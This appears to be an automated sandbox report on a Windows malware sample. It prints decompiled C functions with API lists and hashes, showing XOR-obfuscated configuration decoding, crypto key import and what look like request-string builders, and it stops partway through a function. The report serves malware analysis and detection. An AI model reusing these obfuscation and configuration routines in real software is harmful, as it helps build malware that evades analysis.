                                • Instruction Fuzzy Hash: D5015E35600029BFDB119FA4CC449AEBBB9FB08754F08452AE906E7130FB70AD66D7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 89%
                                			E04611CEF(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                				char _v8;
                                				void* _t14;
                                				intOrPtr _t17;
                                				void* _t20;
                                				void* _t26;
                                
                                				_push(__ecx);
                                				if(_a4 == 0 || __eax == 0) {
                                					_t26 = 0x57;
                                				} else {
                                					_t14 = E04616176(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                					_t26 = _t14;
                                					if(_t26 == 0) {
                                						_t17 =  *0x461a2d4; // 0xdad5a8
                                						_t9 = _t17 + 0x461b9d4; // 0x444f4340
                                						_t20 = E04612F68( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                						_t26 = _t20;
                                						RtlFreeHeap( *0x461a290, 0, _a4); // executed
                                					}
                                				}
                                				return _t26;
                                			}









                                APIs
                                  • Part of subcall function 04616176: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0461618E
                                  • Part of subcall function 04612F68: lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04612F9C
                                  • Part of subcall function 04612F68: StrStrA.SHLWAPI(00000000,?), ref: 04612FA9
                                  • Part of subcall function 04612F68: RtlAllocateHeap.NTDLL(00000000,?), ref: 04612FC8
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04616792), ref: 04611D45
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$Allocate$Freelstrlen
                                • String ID:
                                • API String ID: 2220322926-0
                                • Opcode ID: 4205b096a4b4c75805d5756009d228f3b754d98f21aaa2016f9862d816acbf34
                                • Instruction ID: e7a9bf1d924f13e78c95af0e655da33fb77e83a604d6181c5574bce1c531af77
                                • Opcode Fuzzy Hash: 4205b096a4b4c75805d5756009d228f3b754d98f21aaa2016f9862d816acbf34
                                • Instruction Fuzzy Hash: B8011976200508FFDB128F44DD40EEA7BB9EB59794F18802AFA0996670F731FA45DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04616837(long _a4) {
                                				void* _t2;
                                
                                				_t2 = RtlAllocateHeap( *0x461a290, 0, _a4); // executed
                                				return _t2;
                                			}





                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 6a343c93999ab1807d4bfdc3f1c5b68af2796781035d66e62aba5a0cd311f452
                                • Instruction ID: abf8efa47b7473ea5e462be8c1002ab66c0eefa50ad230b04b613e94cac55ff5
                                • Opcode Fuzzy Hash: 6a343c93999ab1807d4bfdc3f1c5b68af2796781035d66e62aba5a0cd311f452
                                • Instruction Fuzzy Hash: 2BB01271115100AFCB02CB50DE04F057B32F750B01F185016B20400070D23A0C20EB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E046150CA(void* _a4) {
                                				char _t2;
                                
                                				_t2 = RtlFreeHeap( *0x461a290, 0, _a4); // executed
                                				return _t2;
                                			}





                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 5ff7636874a8f3a2895c0eade8ce1021467220e347cc60eeb80593fb4c2e01b5
                                • Instruction ID: 9184f2c8d299143cac9eb6a311455d5b45455c78b67259b16de62a2ea8a98206
                                • Opcode Fuzzy Hash: 5ff7636874a8f3a2895c0eade8ce1021467220e347cc60eeb80593fb4c2e01b5
                                • Instruction Fuzzy Hash: BCB012B1204100ABCB124B40DF04F057B32F750F01F095026B30800070D23A4C20FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04612BE3(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                				void* _v8;
                                				int _v12;
                                				char _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				char _v32;
                                				char _v144;
                                				int _v148;
                                				intOrPtr _v152;
                                				intOrPtr _v156;
                                				intOrPtr _v160;
                                				char _v164;
                                				void* _t37;
                                				void* _t42;
                                				void* _t51;
                                				int _t53;
                                				void* _t60;
                                				void* _t63;
                                				void* _t64;
                                
                                				_t53 = 0;
                                				_t60 = __ecx;
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v8 = 0;
                                				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                					L21:
                                					return _t53;
                                				} else {
                                					_t58 =  &_v164;
                                					_t37 = E046156CF(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                					if(_t37 != 0) {
                                						goto L21;
                                					}
                                					_t61 = _t60 - 0x80;
                                					if(_v148 > _t60 - 0x80) {
                                						goto L21;
                                					}
                                					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                						_t37 = _t37 + 1;
                                						if(_t37 < 0x10) {
                                							continue;
                                						}
                                						_t53 = _v148;
                                						_t51 = E04616837(_t53);
                                						_t73 = _t51;
                                						_v8 = _t51;
                                						if(_t51 != 0) {
                                							_t53 = 0;
                                							L18:
                                							if(_t53 != 0) {
                                								goto L21;
                                							}
                                							L19:
                                							if(_v8 != 0) {
                                								E046150CA(_v8);
                                							}
                                							goto L21;
                                						}
                                						memcpy(_t51, _a4, _t53);
                                						L8:
                                						_t63 = _v8;
                                						E04613984(_t58, _t73, _t63, _t53,  &_v32);
                                						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                							L15:
                                							_t53 = 0;
                                							goto L19;
                                						} else {
                                							 *_a8 = _t63;
                                							goto L18;
                                						}
                                					}
                                					_t58 =  &_v144;
                                					_t42 = E046139C5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                					__eflags = _t42;
                                					if(_t42 != 0) {
                                						_t53 = _v12;
                                						goto L18;
                                					}
                                					_t53 = _v148;
                                					__eflags = _v12 - _t53;
                                					if(__eflags >= 0) {
                                						goto L8;
                                					}
                                					goto L15;
                                				}
                                			}























                                APIs
                                • memcpy.NTDLL(00000000,?,?,?,?,046120FA,?,046120FA,?,046120FA), ref: 04612C6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 4d2eb9597a1ab46a18a08e0d178d681fe764c990d14e00972b6c31e9554b8d78
                                • Instruction ID: 3bb1f6f65487b6920ed075abf2a86cb1627077482a34ff6d2a67f5176aa258c7
                                • Opcode Fuzzy Hash: 4d2eb9597a1ab46a18a08e0d178d681fe764c990d14e00972b6c31e9554b8d78
                                • Instruction Fuzzy Hash: 84316FB5A00159EFDF61DFA5CC90BAEB778BB14304F1840E9E615B3260F630AA84DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04615384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                				void* _t24;
                                				signed short _t25;
                                				signed int _t27;
                                				intOrPtr* _t28;
                                				signed short _t29;
                                
                                				_t28 = __edi;
                                				if(_a4 == 0) {
                                					L2:
                                					_t29 = E04616A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t29 == 0) {
                                						_t27 = _a12 >> 1;
                                						if(_t27 == 0) {
                                							_t29 = 2;
                                							HeapFree( *0x461a290, 0, _a4);
                                						} else {
                                							_t24 = _a4;
                                							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                                							 *_t28 = _t24;
                                						}
                                					}
                                					L6:
                                					return _t29;
                                				}
                                				_t25 = E04614576(_a4, _a8, _a12, __edi); // executed
                                				_t29 = _t25;
                                				if(_t29 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
                                			}








                                APIs
                                  • Part of subcall function 04614576: SysFreeString.OLEAUT32(00000000), ref: 046145DC
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,04611AF5,?,004F0053,053C9308,00000000,?), ref: 046153E5
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Free$HeapString
                                • String ID:
                                • API String ID: 3806048269-0
                                • Opcode ID: f5275df62ad06e3a6099e954ba46cb7fd6f78c16c22ca0afea1872034935e987
                                • Instruction ID: cd342c1b69d7c652fe7f8996bff4859105c25c2f906d7b5578b23e3a148f8893
                                • Opcode Fuzzy Hash: f5275df62ad06e3a6099e954ba46cb7fd6f78c16c22ca0afea1872034935e987
                                • Instruction Fuzzy Hash: EA01E832101659BBCB229F44CC51EAA7BA5EB54791F888029FE065A270F771E960DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E046149FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                				void* _t13;
                                				void* _t21;
                                
                                				_t11 =  &_a4;
                                				_t21 = 0;
                                				__imp__( &_a8);
                                				_t13 = E046139C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                				if(_t13 == 0) {
                                					_t21 = E04616837(_a8 + _a8);
                                					if(_t21 != 0) {
                                						E04612E61(_a4, _t21, _t23);
                                					}
                                					E046150CA(_a4);
                                				}
                                				return _t21;
                                			}





                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 04614A0F
                                  • Part of subcall function 046139C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04614A23,00000001,046170D9,00000000), ref: 046139FD
                                  • Part of subcall function 046139C5: memcpy.NTDLL(04614A23,046170D9,00000010,?,?,?,04614A23,00000001,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000), ref: 04613A16
                                  • Part of subcall function 046139C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04613A3F
                                  • Part of subcall function 046139C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04613A57
                                  • Part of subcall function 046139C5: memcpy.NTDLL(00000000,00000000,053C9630,00000010), ref: 04613AA9
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                • String ID:
                                • API String ID: 894908221-0
                                • Opcode ID: 4a069c444d42b0fbb0e3d24cc4b7f67e065049c9cf56e66aab4247af1eaaddae
                                • Instruction ID: eba4e59b33c71efebad0a673e7b28b5e31191e3ba28b29d3c83fa8f2890c55cc
                                • Opcode Fuzzy Hash: 4a069c444d42b0fbb0e3d24cc4b7f67e065049c9cf56e66aab4247af1eaaddae
                                • Instruction Fuzzy Hash: F6F03076100108BADF11AE55DC40DEF3F6DEF85354B098026FD098B124EA31E555D7A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E04611FC2(intOrPtr* __edi) {
                                				intOrPtr _v8;
                                				char _v12;
                                				intOrPtr _v16;
                                				intOrPtr _t15;
                                				intOrPtr* _t21;
                                
                                				_t21 = __edi;
                                				_push( &_v12);
                                				_push(__edi);
                                				_v8 = 0x1d4c0;
                                				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                				while(1) {
                                					_v16 = _t15;
                                					Sleep(0x1f4); // executed
                                					if(_v12 == 4) {
                                						break;
                                					}
                                					if(_v8 == 0) {
                                						L4:
                                						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                						continue;
                                					} else {
                                						if(_v8 <= 0x1f4) {
                                							_v16 = 0x80004004;
                                						} else {
                                							_v8 = _v8 - 0x1f4;
                                							goto L4;
                                						}
                                					}
                                					L8:
                                					return _v16;
                                				}
                                				goto L8;
                                			}








                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 0461200A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: f309d05eac32f3f665050ddab9c713f0d67e14e210130a3386c7de0be0d4c825
                                • Instruction ID: 99735c1218fedc6d04e70f2676b7f4fdc49f8fc355069f3e59f8d84fa2853590
                                • Opcode Fuzzy Hash: f309d05eac32f3f665050ddab9c713f0d67e14e210130a3386c7de0be0d4c825
                                • Instruction Fuzzy Hash: FAF03C71D01218EFDB00DFD4C498AEDB7B8FF05345F1840AAE502A3210E3B46B84DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04611F7A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                				void* _t17;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					return E04611A15(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                				}
                                				_t17 = E046117B0(_a4, _a8, _a12, _a16, _a20); // executed
                                				if(_t17 != 0) {
                                					goto L2;
                                				}
                                				return _t17;
                                			}




                                APIs
                                • lstrlenW.KERNEL32(?,?,?,04611F20,3D046190,80000002,046130C2,04614106,74666F53,4D4C4B48,04614106,?,3D046190,80000002,046130C2,?), ref: 04611F9F
                                  • Part of subcall function 046117B0: SysAllocString.OLEAUT32(04614106), ref: 046117CA
                                  • Part of subcall function 046117B0: SysFreeString.OLEAUT32(00000000), ref: 0461180A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: e9fdb49e6cbe87d2d61cd1b70c55ece28fe9619ef427e207712b2cc89a091678
                                • Instruction ID: adc0cc5bb568f00ac5b0935f4308248d0a7a0328ba490dfdd0f436c0d13ade23
                                • Opcode Fuzzy Hash: e9fdb49e6cbe87d2d61cd1b70c55ece28fe9619ef427e207712b2cc89a091678
                                • Instruction Fuzzy Hash: F1F01F3200420EBFDF169F90DC05EEA3F6AAB19354F088119BA1455171E772E5B1EBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0461738C(void* __edi, void* _a4) {
                                				int _t7;
                                				int _t12;
                                
                                				_t7 = E0461181D(__edi, _a4,  &_a4); // executed
                                				_t12 = _t7;
                                				if(_t12 != 0) {
                                					memcpy(__edi, _a4, _t12);
                                					 *((char*)(__edi + _t12)) = 0;
                                					E046150CA(_a4);
                                				}
                                				return _t12;
                                			}





                                APIs
                                  • Part of subcall function 0461181D: memcpy.NTDLL(00000000,00000110,046120FA,046120FA,?,?,046120FA,?,?,04616042,?), ref: 04611853
                                  • Part of subcall function 0461181D: memset.NTDLL ref: 046118C8
                                  • Part of subcall function 0461181D: memset.NTDLL ref: 046118DC
                                • memcpy.NTDLL(046120FA,046120FA,00000000,046120FA,046120FA,046120FA,?,?,04616042,?,?,046120FA,?), ref: 046173A8
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memcpymemset$FreeHeap
                                • String ID:
                                • API String ID: 3053036209-0
                                • Opcode ID: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
                                • Instruction ID: 4baf4bf63ee1a5b45a1b7f84bd2f34a528f58798571006620beb086b45bd334d
                                • Opcode Fuzzy Hash: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
                                • Instruction Fuzzy Hash: 7AE0867740011877DB123AD4DC00DEF7F6CCF56691F088029FE0846210F622E55097F5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 94%
                                			E04612206(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t26;
                                				signed int _t31;
                                				signed int _t37;
                                				char* _t43;
                                				char* _t44;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				void* _t48;
                                				void* _t49;
                                				intOrPtr _t50;
                                				signed int _t56;
                                				void* _t58;
                                				void* _t59;
                                				signed int _t61;
                                				signed int _t65;
                                				signed int _t69;
                                				signed int _t73;
                                				signed int _t77;
                                				signed int _t81;
                                				void* _t86;
                                				intOrPtr _t102;
                                
                                				_t87 = __ecx;
                                				_t26 =  *0x461a2d0; // 0x63699bc3
                                				if(E04611BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
                                					 *0x461a324 = _v8;
                                				}
                                				_t31 =  *0x461a2d0; // 0x63699bc3
                                				if(E04611BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                					_v12 = 2;
                                					L50:
                                					return _v12;
                                				}
                                				_t37 =  *0x461a2d0; // 0x63699bc3
                                				if(E04611BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                					L48:
                                					HeapFree( *0x461a290, 0, _v16);
                                					goto L50;
                                				} else {
                                					_t86 = _v12;
                                					if(_t86 == 0) {
                                						_t43 = 0;
                                					} else {
                                						_t81 =  *0x461a2d0; // 0x63699bc3
                                						_t43 = E046138CE(_t87, _t86, _t81 ^ 0x724e87bc);
                                					}
                                					if(_t43 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                							 *0x461a298 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t44 = 0;
                                					} else {
                                						_t77 =  *0x461a2d0; // 0x63699bc3
                                						_t44 = E046138CE(_t87, _t86, _t77 ^ 0x2b40cc40);
                                					}
                                					if(_t44 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                							 *0x461a29c = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t73 =  *0x461a2d0; // 0x63699bc3
                                						_t45 = E046138CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
                                					}
                                					if(_t45 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x461a2a0 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t69 =  *0x461a2d0; // 0x63699bc3
                                						_t46 = E046138CE(_t87, _t86, _t69 ^ 0x0602e249);
                                					}
                                					if(_t46 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x461a004 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t65 =  *0x461a2d0; // 0x63699bc3
                                						_t47 = E046138CE(_t87, _t86, _t65 ^ 0x3603764c);
                                					}
                                					if(_t47 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x461a02c = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t61 =  *0x461a2d0; // 0x63699bc3
                                						_t48 = E046138CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
                                					}
                                					if(_t48 != 0) {
                                						_push(_t48);
                                						_t58 = 0x10;
                                						_t59 = E04613E49(_t58);
                                						if(_t59 != 0) {
                                							_push(_t59);
                                							E046150DF();
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t56 =  *0x461a2d0; // 0x63699bc3
                                						_t49 = E046138CE(_t87, _t86, _t56 ^ 0xb30fc035);
                                					}
                                					if(_t49 != 0 && E04613E49(0, _t49) != 0) {
                                						_t102 =  *0x461a37c; // 0x53c9630
                                						E046110DD(_t102 + 4, _t54);
                                					}
                                					_t50 =  *0x461a2d4; // 0xdad5a8
                                					_t20 = _t50 + 0x461b252; // 0x53c87fa
                                					_t21 = _t50 + 0x461b7b5; // 0x6976612e
                                					 *0x461a320 = _t20;
                                					 *0x461a390 = _t21;
                                					HeapFree( *0x461a290, 0, _t86);
                                					_v12 = 0;
                                					goto L48;
                                				}
                                			}

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 046122AB
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 046122DD
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 0461230F
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 04612341
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 04612373
                                • HeapFree.KERNEL32(00000000,?,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 0461240F
                                • HeapFree.KERNEL32(00000000,?,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 04612422
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 2803e4cdfb3596141c770329779d1e9acfc0751a08e5aa7fdeda1a17409acfcc
                                • Instruction ID: 1ecc9c3484300d780fec42e5b8f9939388aa04505d70b8a2446284103a0e95cb
                                • Opcode Fuzzy Hash: 2803e4cdfb3596141c770329779d1e9acfc0751a08e5aa7fdeda1a17409acfcc
                                • Instruction Fuzzy Hash: A8618F70B00114ABDB11DBF5D998C9F77B9EB48740B2C19AAA502E3270FA39FD41DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 70%
                                			E04616EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                				intOrPtr _v4;
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				void* _v24;
                                				intOrPtr _v40;
                                				void* __ecx;
                                				void* __edi;
                                				intOrPtr _t31;
                                				intOrPtr _t32;
                                				intOrPtr _t33;
                                				intOrPtr _t34;
                                				intOrPtr _t35;
                                				void* _t38;
                                				intOrPtr _t39;
                                				int _t42;
                                				void* _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t48;
                                				intOrPtr _t52;
                                				intOrPtr _t55;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t66;
                                				intOrPtr* _t68;
                                				intOrPtr _t78;
                                				intOrPtr _t81;
                                				intOrPtr _t84;
                                				int _t87;
                                				intOrPtr _t88;
                                				int _t91;
                                				intOrPtr _t92;
                                				int _t95;
                                				void* _t98;
                                				void* _t99;
                                				void* _t103;
                                				intOrPtr _t105;
                                				long _t107;
                                				intOrPtr _t108;
                                				intOrPtr* _t109;
                                				long _t110;
                                				int _t111;
                                				void* _t112;
                                				void* _t113;
                                				void* _t114;
                                				void* _t115;
                                				void* _t117;
                                				void* _t118;
                                				void* _t120;
                                				void* _t121;
                                
                                				_t103 = __edx;
                                				_t110 = __eax;
                                				_v8 = 8;
                                				_t117 = RtlAllocateHeap( *0x461a290, 0, 0x800);
                                				if(_t117 != 0) {
                                					if(_t110 == 0) {
                                						_t110 = GetTickCount();
                                					}
                                					_t31 =  *0x461a018; // 0x4934a3dd
                                					asm("bswap eax");
                                					_t32 =  *0x461a014; // 0x5cb11ae7
                                					asm("bswap eax");
                                					_t33 =  *0x461a010; // 0x15dc9586
                                					asm("bswap eax");
                                					_t34 =  *0x461a00c; // 0x69ab8210
                                					asm("bswap eax");
                                					_t35 =  *0x461a2d4; // 0xdad5a8
                                					_t2 = _t35 + 0x461b613; // 0x74666f73
                                					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x461a02c,  *0x461a004, _t110);
                                					_t38 = E04616A09();
                                					_t39 =  *0x461a2d4; // 0xdad5a8
                                					_t3 = _t39 + 0x461b653; // 0x74707526
                                					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                					_t120 = _t118 + 0x38;
                                					_t112 = _t111 + _t42;
                                					if(_a12 != 0) {
                                						_t92 =  *0x461a2d4; // 0xdad5a8
                                						_t7 = _t92 + 0x461b65e; // 0x732526
                                						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                						_t120 = _t120 + 0xc;
                                						_t112 = _t112 + _t95;
                                					}
                                					_t43 = E04615040(_t99);
                                					_t44 =  *0x461a2d4; // 0xdad5a8
                                					_t9 = _t44 + 0x461b302; // 0x6d697426
                                					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
